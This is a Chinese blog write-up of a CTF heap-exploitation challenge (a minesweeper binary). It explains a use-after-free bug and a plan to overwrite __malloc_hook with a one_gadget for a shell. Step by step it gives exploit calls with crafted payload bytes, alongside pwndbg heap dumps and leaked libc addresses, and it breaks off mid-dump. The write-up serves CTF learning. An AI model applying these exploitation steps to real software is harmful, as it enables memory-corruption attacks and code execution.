美文网首页
看雪.京东 2018CTF 第十四题PWN-minesweep的

看雪.京东 2018CTF 第十四题PWN-minesweep的

作者: 静析机言 | 来源:发表于2019-05-28 17:16 被阅读0次

此题为一个堆利用题,保护全开。

程序实现了8*8扫雷游戏。

程序菜单为:

1. Start Game

2. Feed Back Bugs

3. help

4. exit

$ 1

----------------------

Welcome to minesweeper

  Panel:8*8 Mine:30

----------------------

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

*  *  *  *  *  *  *  *

----------------------

主功能菜单有两个:一是开始扫雷游戏(即使游戏局结束,因为UAF的存在,可以继续上一局);二是feed。

扫雷游戏里有三个命令可供选择:

explore 探雷

back 回主菜单

out 游戏清局并回主菜单

漏洞点在out功能中。虽然free了3个chunk,但没有删除指针,导致UAF。由于feed时,可以申请随意大小的chunk并写入内容,再free掉,使得UAF可以有办法利用。

利用思路:利用chunk1中的name指针可以任意写,通过此办法写__malloc_hook的内容为one_gadget地址,进而getshell;leak地址只能从唯一有打印变量功能的printMatrix_1395或printMatrix_14EE入手,打印当前排雷矩阵。

下面以poyoten写的writeup为例,用pwndbg调试详细分析每一步的含义,记录学习过程。

https://bbs.pediy.com/thread-229731.htm

1. start()

开始游戏,获得chunk1-chunk6地址。

0x56034c1a6018:    0x000056034da40010     0x0000000000000008

0x56034c1a6028:    0x000000000000001e     0x000056034da40140

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041  //chunk1

0x56034da40010:    0x000056034da40080     0x0000000000000001

0x56034da40020:    0x000056034da400a0     0x0000000000000000

0x56034da40030:    0x000056034da400f0      0x000056034da40050

0x56034da40040:    0x0000000000000000     0x0000000000000031  //chunk2

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021  //chunk3

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x0000000000000051  //chunk4

0x56034da400a0:    0x0000000000000000     0x0000000000000000

0x56034da400b0:    0x0000000000000000     0x0000000000000000

0x56034da400c0:    0x0000000000000000     0x0000000000000000

0x56034da400d0:    0x0000000000000000     0x0000000000000000

0x56034da400e0:    0x0000000000000000     0x0000000000000051  //chunk5

0x56034da400f0:     0x0100000000000101     0x0001010101000000

0x56034da40100:    0x0101000101010001     0x0000000001000001

0x56034da40110:    0x0000000100010001     0x0100000100010100

0x56034da40120:    0x0100010001010000     0x0101000000010100

0x56034da40130:    0x0000000000000000     0x0000000000000051  //chunk6

0x56034da40140:    0x000056034da40190     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x0000000000000000     0x0000000000000021

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

此时堆的分布如下

pwndbg> bins

fastbins

0x20: 0x56034da40400 —▸ 0x56034da403e0 —▸ 0x56034da403c0 —▸ 0x56034da403a0 —▸ 0x56034da40380 ◂—...

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x56034da40280 ◂—0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

empty

largebins

empty

2. out()

chunk1、chunk4、chunk5放入fastbins中

pwndbg> bins

fastbins

0x20: 0x56034da40400 —▸ 0x56034da403e0 —▸ 0x56034da403c0 —▸ 0x56034da403a0 —▸ 0x56034da40380 ◂—...

0x30: 0x0

0x40:0x56034da40000◂—0x0

0x50:0x56034da40090—▸0x56034da400e0 ◂—0x0

0x60: 0x56034da40280 ◂—0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

empty

largebins

empty

3. feed(0x30,'1'*0x28+'\xe8')

分配chunk1,写入内容后再free

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000: 0x0000000000000000 0x0000000000000041

0x56034da40010: 0x0000000000000000 0x3131313131313131

0x56034da40020: 0x3131313131313131 0x3131313131313131

0x56034da40030: 0x3131313131313131 0x000056034da400e8

4. start()

没变化

5. explore(1,1,3)

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000: 0x0000000000000000 0x0000000000000041

0x56034da40010: 0x0000000000000000 0x3131313131313131

0x56034da40020: 0x3131313131313131 0x3131313131313131

0x56034da40030: 0x3131313131313131 0x000056034da400e8

因为存放winflag地址的内容为0x3131313131313131(粗体标出)不等于0,所以打印” leave your name,my hero”

6. io.sendline('\xa1')

在0x000056034da400e8位置写入name,即为’\xa1’,即修改chunk5的大小为a1。

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000: 0x0000000000000000 0x0000000000000041

0x56034da40010: 0x0000000000000000 0x3131313131313131

0x56034da40020: 0x3131313131313131 0x3131313131313131

0x56034da40030: 0x3131313131313131 0x000056034da400e8

0x56034da40040: 0x0000000000000000 0x0000000000000031

0x56034da40050: 0x0000000000000000 0x0000000000000000

0x56034da40060: 0x0000000000000000 0x0000000000000000

0x56034da40070: 0x0000000000000000 0x0000000000000021

0x56034da40080: 0x0000000000000000 0x0000000000000000

0x56034da40090: 0x0000000000000000 0x0000000000000051

0x56034da400a0: 0x000056034da400e0 0x0000000000000000

0x56034da400b0: 0x0000000000000000 0x0000000000000000

0x56034da400c0: 0x0000000000000000 0x0000000000000000

0x56034da400d0: 0x0000000000000000 0x0000000000000000

0x56034da400e0: 0x0000000000000000 0x00000000000000a1

0x56034da400f0: 0x0000000000000000 0x0001010101000000

0x56034da40100: 0x0101000101010001 0x0000000001000001

0x56034da40110: 0x0000000100010001 0x0100000100010100

0x56034da40120: 0x0100010001010000 0x0101000000010100

0x56034da40130: 0x0000000000000000 0x0000000000000051

0x56034da40140: 0x000056034da40190 0x000056034da401b0

0x56034da40150: 0x000056034da401d0 0x000056034da401f0

0x56034da40160: 0x000056034da40210 0x000056034da40230

0x56034da40170: 0x000056034da40250 0x000056034da40270

0x56034da40180: 0x0000000000000000 0x0000000000000021

0x56034da40190: 0x322a322a582a582a 0x582a332a332a332a

0x56034da401a0: 0x0000000000000000 0x0000000000000021

0x56034da401b0: 0x582a342a342a332a 0x342a582a582a582a

0x56034da401c0: 0x0000000000000000 0x0000000000000021

0x56034da401d0: 0x582a582a332a582a 0x582a582a352a582a

0x56034da401e0: 0x0000000000000000 0x0000000000000021

0x56034da401f0: 0x582a342a352a582a 0x322a322a332a342a

0x56034da40200: 0x0000000000000000 0x0000000000000021

0x56034da40210: 0x352a582a352a582a 0x312a312a322a582a

0x56034da40220: 0x0000000000000000 0x0000000000000021

0x56034da40230: 0x362a582a582a322a 0x582a332a332a582a

0x56034da40240: 0x0000000000000000 0x0000000000000021

0x56034da40250: 0x582a582a352a322a 0x582a352a582a332a

0x56034da40260: 0x0000000000000000 0x0000000000000021

0x56034da40270: 0x332a582a582a312a 0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x56034da40400 —▸ 0x56034da403e0 —▸ 0x56034da403c0 —▸ 0x56034da403a0 —▸ 0x56034da40380 ◂— ...

0x30: 0x0

0x40: 0x56034da40000 ◂— 0x0

0x50: 0x56034da40090 —▸ 0x56034da400e0 ◂— 0x0

0x60: 0x56034da40280 ◂— 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x0

smallbins

empty

largebins

empty

io.sendline('back,')

7. feed(0xe0,'a'*32)

feed一个大尺寸的chunk:分配top chunk(0x56034da40420)出来,写完内容后再free,将放在top chunk中。fastbin就会consolidate。chunk1和chunk4(chunk4与chunk5合并后的新chunk4)放入unsortedbin中。

pwndbg> x/50gx 0x56034da40430-0x10

0x56034da40420:    0x0000000000000000     0x0000000000020be1

0x56034da40430:    0x6161616161616161     0x6161616161616161

0x56034da40440:    0x6161616161616161     0x6161616161616161

pwndbg> x/80gx 0x000055b55502b010-0x10

0x55b55502b000:    0x0000000000000000     0x0000000000000041

0x55b55502b010:    0x00007f305232fba8       0x00007f305232fba8

0x55b55502b020:    0x3131313131313131     0x3131313131313131

0x55b55502b030:    0x3131313131313131     0x000055b55502b0e8

0x55b55502b040:    0x0000000000000040     0x0000000000000030

0x55b55502b050:    0x0000000000000000     0x0000000000000000

0x55b55502b060:    0x0000000000000000     0x0000000000000000

0x55b55502b070:    0x0000000000000000     0x0000000000000021

0x55b55502b080:    0x0000000000000000     0x0000000000000000

0x55b55502b090:    0x0000000000000000     0x00000000000000f1  //chunk4与chunk5合并,size=0x50+0xA0=0xF0

0x55b55502b0a0:    0x00007f305232fc58       0x00007f305232fc58

0x55b55502b0b0:    0x0000000000000000     0x0000000000000000

0x55b55502b0c0:    0x0000000000000000     0x0000000000000000

0x55b55502b0d0:    0x0000000000000000     0x0000000000000000

0x55b55502b0e0:    0x0000000000000050     0x00000000000000a0

0x55b55502b0f0:     0x0000000000000000     0x0000010000010101

0x55b55502b100:    0x0100010000000100     0x0101000000010001

0x55b55502b110:    0x0000000001010101     0x0101000001010001

0x55b55502b120:    0x0000000000000101     0x0100000101010001

0x55b55502b130:    0x0000000000000000     0x0000000000000051

0x55b55502b140:    0x000055b55502b190     0x000055b55502b1b0

0x55b55502b150:    0x000055b55502b1d0     0x000055b55502b1f0

0x55b55502b160:    0x000055b55502b210     0x000055b55502b230

0x55b55502b170:    0x000055b55502b250     0x000055b55502b270

0x55b55502b180:    0x00000000000000f0      0x0000000000000020

0x55b55502b190:    0x312a322a332a322a     0x582a582a582a322a

0x55b55502b1a0:    0x0000000000000000     0x0000000000000021

0x55b55502b1b0:    0x312a582a582a582a     0x332a362a582a332a

0x55b55502b1c0:    0x0000000000000000     0x0000000000000021

0x55b55502b1d0:    0x322a342a582a342a     0x582a352a582a322a

0x55b55502b1e0:    0x0000000000000000     0x0000000000000021

0x55b55502b1f0:     0x332a582a362a582a     0x582a582a322a322a

0x55b55502b200:    0x0000000000000000     0x0000000000000021

0x55b55502b210:    0x582a582a582a582a     0x342a342a322a322a

0x55b55502b220:    0x0000000000000000     0x0000000000000021

0x55b55502b230:    0x582a582a372a582a     0x582a582a312a322a

0x55b55502b240:    0x0000000000000000     0x0000000000000021

0x55b55502b250:    0x352a352a582a582a     0x332a332a322a332a

0x55b55502b260:    0x0000000000000000     0x0000000000000021

0x55b55502b270:    0x582a582a342a582a     0x582a312a312a582a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x56034da40000 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

empty

largebins

empty

8. feed(0xe0,'a'*0xa0+'\x41')

从unsortedbin中取出chunk4,将chunk4的地址分配出来,写入内容,然后free;同时将chunk1的地址整理到smallbins[0x40]中

‘\x41’用来控制start时打印的数据所在位置:ch-1将地址往前移,以便移动到chunk4的位置。

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da40141     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all:0x56034da40090—▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

0x40:0x56034da40000—▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

9. start()  

ch = ord(getres()[0])  

io.sendline('back,')

00000000 2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │----│----│----│----│

00000010 2d 2d 2d 2d  2d 2d 0a 57  65 6c 63 6f 6d 65 20 74  │----│--·W│elco│me t│

00000020 6f 20 6d 69  6e 65 73 77  65 65 70 65 72 0a 20 20  │o mi│nesw│eepe│r·  │

00000030 20 50 61 6e  65 6c 3a 38  2a 38 20 4d 69 6e 65 3a  │ Pan│el:8│*8 M│ine:│

00000040 33 30 0a 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │30·-│----│----│----│

00000050 2d 2d 2d 2d  2d 2d 2d 2d  2d 0a0120  20 4d 20 20  │----│----│-··│M  │

00000060 56 20 20 00  20 20 01 20  20 4d 20 20 56 20 20 00  │V  ·│  ·│M │V  ·│

00000070 20 20 0a 2a  20 20 2a 20  20 2a 20 20 2a 20 20 2a  │  ·*│  *│*  │*  *│

00000080 20 20 2a 20  20 2a 20 20  2a 20 20 0a 2a 20 20 2a  │  *│*  │*  ·│*  *│

00000090 20 20 2a 20  20 2a 20 20  2a 20 20 2a 20 20 2a 20  │  *│*  │*  *│  *│

000000a0 20 2a 20 20  0a 2a 20 20  2a 20 20 2a 20 20 2a 20  │*  │·*  │*  *│  *│

000000b0 20 2a 20 20  2a 20 20 2a  20 20 2a 20 20 0a 2a 20  │*  │*  *│  *│·* │

000000c0 20 2a 20 20  2a 20 20 2a  20 20 2a 20 20 2a 20 20  │*  │*  *│  *│*  │

000000d0 2a 20 20 2a  20 20 0a 2a  20 20 2a 20 20 2a 20 20  │*  *│  ·*│  *│*  │

000000e0 2a 20 20 2a  20 20 2a 20  20 2a 20 20 2a 20 20 0a  │*  *│  *│*  │*  ·│

000000f0 2a 20 20 2a  20 20 2a 20  20 2a 20 20 2a 20 20 2a  │*  *│  *│*  │*  *│

00000100 20 20 2a 20  20 2a 20 20  0a 2a 20 20 2a 20 20 2a  │  *│*  │·*  │*  *│

00000110 20 20 2a 20  20 2a 20 20  2a 20 20 2a 20 20 2a 20  │  *│*  │*  *│  *│

00000120 20 0a 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │·--│----│----│----│

00000130 2d 2d 2d 2d  2d 2d 2d 2d  0a                        │----│----│·│

11. feed(0xe0,'a'*0xa0+'\xa0'+chr(ch-1))

从unsortedbin中将chunk4的地址分配出来,写入内容后再free。

修改了chunk6中2个低字节,地址变成0x000056034da400a0,指向chunk4

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a0     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

12. start()

因为执行printMatrix_1395时,打印一个有效字符,空2格。

r1

00000000 2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │----│----│----│----│

00000010 2d 2d 2d 2d  2d 2d 0a 57  65 6c 63 6f 6d 65 20 74  │----│--·W│elco│me t│

00000020 6f 20 6d 69  6e 65 73 77  65 65 70 65 72 0a 20 20  │o mi│nesw│eepe│r·  │

00000030 20 50 61 6e  65 6c 3a 38  2a 38 20 4d 69 6e 65 3a  │ Pan│el:8│*8 M│ine:│

00000040 33 30 0a 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │30·-│----│----│----│

00000050 2d 2d 2d 2d  2d 2d 2d 2d  2d 0a78 20  2062 2020  │----│----│-·x │b  │

00000060 0f20 20 00  20 20 78 20 20 62 20 20  0f 20 20 00  │·  ·│  x│b  │·  ·│

00000070 20 20 0a 2a  20 20 2a 20  20 2a 20 20 2a 20 20 2a  │  ·*│  *│*  │*  *│

00000080 20 20 2a 20  20 2a 20 20  2a 20 20 0a 2a 20 20 2a  │  *│*  │*  ·│*  *│

00000090 20 20 2a 20  20 2a 20 20  2a 20 20 2a 20 20 2a 20  │  *│*  │*  *│  *│

000000a0 20 2a 20 20  0a 2a 20 20  2a 20 20 2a 20 20 2a 20  │*  │·*  │*  *│  *│

000000b0 20 2a 20 20  2a 20 20 2a  20 20 2a 20 20 0a 2a 20  │*  │*  *│  *│·* │

000000c0 20 2a 20 20  2a 20 20 2a  20 20 2a 20 20 2a 20 20  │*  │*  *│  *│*  │

000000d0 2a 20 20 2a  20 20 0a 2a  20 20 2a 20 20 2a 20 20  │*  *│  ·*│  *│*  │

000000e0 2a 20 20 2a  20 20 2a 20  20 2a 20 20 2a 20 20 0a  │*  *│  *│*  │*  ·│

000000f0 2a 20 20 2a  20 20 2a 20  20 2a 20 20 2a 20 20 2a  │*  *│  *│* │*  *│

00000100 20 20 2a 20  20 2a 20 20  0a 2a 20 20 2a 20 20 2a  │  *│*  │·*  │*  *│

00000110 20 20 2a 20  20 2a 20 20  2a 20 20 2a 20 20 2a 20  │  *│*  │*  *│  *│

00000120 20 0a 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │·--│----│----│----│

00000130 2d 2d 2d 2d  2d 2d 2d 2d  0a                        │----│----│·│

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a0     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸0x7f0f33623b78 (main_arena+88)◂—0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

14. feed(0xe0,'a'*0xa0+'\xa1'+chr(ch-1))

从unsortedbin中将chunk4的地址分配出来,写入内容后再free。

修改了chunk6中2个低字节,地址变成0x000056034da400a1,指向chunk4+1的位置

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

0x56034da40080:    0x0000000000000000     0x0000000000000000

0x56034da40090:    0x0000000000000000     0x00000000000000f1

0x56034da400a0:    0x00007f0f33623b78       0x00007f0f33623b78

0x56034da400b0:    0x6161616161616161     0x6161616161616161

0x56034da400c0:    0x6161616161616161     0x6161616161616161

0x56034da400d0:    0x6161616161616161     0x6161616161616161

0x56034da400e0:    0x6161616161616161     0x6161616161616161

0x56034da400f0:     0x6161616161616161     0x6161616161616161

0x56034da40100:    0x6161616161616161     0x6161616161616161

0x56034da40110:    0x6161616161616161     0x6161616161616161

0x56034da40120:    0x6161616161616161     0x6161616161616161

0x56034da40130:    0x6161616161616161     0x6161616161616161

0x56034da40140:    0x000056034da400a1     0x000056034da401b0

0x56034da40150:    0x000056034da401d0     0x000056034da401f0

0x56034da40160:    0x000056034da40210     0x000056034da40230

0x56034da40170:    0x000056034da40250     0x000056034da40270

0x56034da40180:    0x00000000000000f0      0x0000000000000020

0x56034da40190:    0x322a322a582a582a     0x582a332a332a332a

0x56034da401a0:    0x0000000000000000     0x0000000000000021

0x56034da401b0:    0x582a342a342a332a     0x342a582a582a582a

0x56034da401c0:    0x0000000000000000     0x0000000000000021

0x56034da401d0:    0x582a582a332a582a     0x582a582a352a582a

0x56034da401e0:    0x0000000000000000     0x0000000000000021

0x56034da401f0:     0x582a342a352a582a     0x322a322a332a342a

0x56034da40200:    0x0000000000000000     0x0000000000000021

0x56034da40210:    0x352a582a352a582a     0x312a312a322a582a

0x56034da40220:    0x0000000000000000     0x0000000000000021

0x56034da40230:    0x362a582a582a322a     0x582a332a332a582a

0x56034da40240:    0x0000000000000000     0x0000000000000021

0x56034da40250:    0x582a582a352a322a     0x582a352a582a332a

0x56034da40260:    0x0000000000000000     0x0000000000000021

0x56034da40270:    0x332a582a582a312a     0x582a582a322a322a

pwndbg> bins

fastbins

0x20: 0x0

0x30: 0x0

0x40: 0x0

0x50: 0x0

0x60: 0x0

0x70: 0x0

0x80: 0x0

unsortedbin

all: 0x56034da40090 —▸ 0x7f0f33623b78 (main_arena+88) ◂—0x56034da40090

smallbins

0x40: 0x56034da40000 —▸ 0x7f0f33623ba8 (main_arena+136) ◂—0x56034da40000

largebins

empty

15. start()

r2 = getres()

00000000 2d 2d 2d 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │----│----│----│----│

00000010 2d 2d 2d 2d  2d 2d 0a 57  65 6c 63 6f 6d 65 20 74  │----│--·W│elco│me t│

00000020 6f 20 6d 69 6e 65 73 77  65 65 70 65 72 0a 20 20  │o mi│nesw│eepe│r·  │

00000030 20 50 61 6e  65 6c 3a 38  2a 38 20 4d 69 6e 65 3a  │ Pan│el:8│*8 M│ine:│

00000040 33 30 0a 2d  2d 2d 2d 2d  2d 2d 2d 2d 2d 2d 2d 2d  │30·-│----│----│----│

00000050 2d 2d 2d 2d  2d 2d 2d 2d  2d 0a3b20  20 3320 20  │----│----│-·; │3  │

00000060 7f 20 20 00  20 20 3b 20 20 33 20 20  7f 20 20 00  │·  ·│  ;│3  │·  ·│

00000070 20 20 0a 2a  20 20 2a 20  20 2a 20 20 2a 20 20 2a  │  ·*│  *│*  │*  *│

00000080 20 20 2a 20  20 2a 20 20  2a 20 20 0a 2a 20 20 2a  │  *│*  │*  ·│*  *│

00000090 20 20 2a 20  20 2a 20 20  2a 20 20 2a 20 20 2a 20  │  *│*  │*  *│  *│

000000a0 20 2a 20 20  0a 2a 20 20  2a 20 20 2a 20 20 2a 20  │*  │·*  │*  *│  *│

000000b0 20 2a 20 20  2a 20 20 2a  20 20 2a 20 20 0a 2a 20  │*  │*  *│  *│·* │

pwndbg> x/80gx 0x000056034da40010-0x10

0x56034da40000:    0x0000000000000000     0x0000000000000041

0x56034da40010:    0x00007f0f33623ba8       0x00007f0f33623ba8

0x56034da40020:    0x3131313131313131     0x3131313131313131

0x56034da40030:    0x3131313131313131     0x000056034da400e8

0x56034da40040:    0x0000000000000040     0x0000000000000030

0x56034da40050:    0x0000000000000000     0x0000000000000000

0x56034da40060:    0x0000000000000000     0x0000000000000000

0x56034da40070:    0x0000000000000000     0x0000000000000021

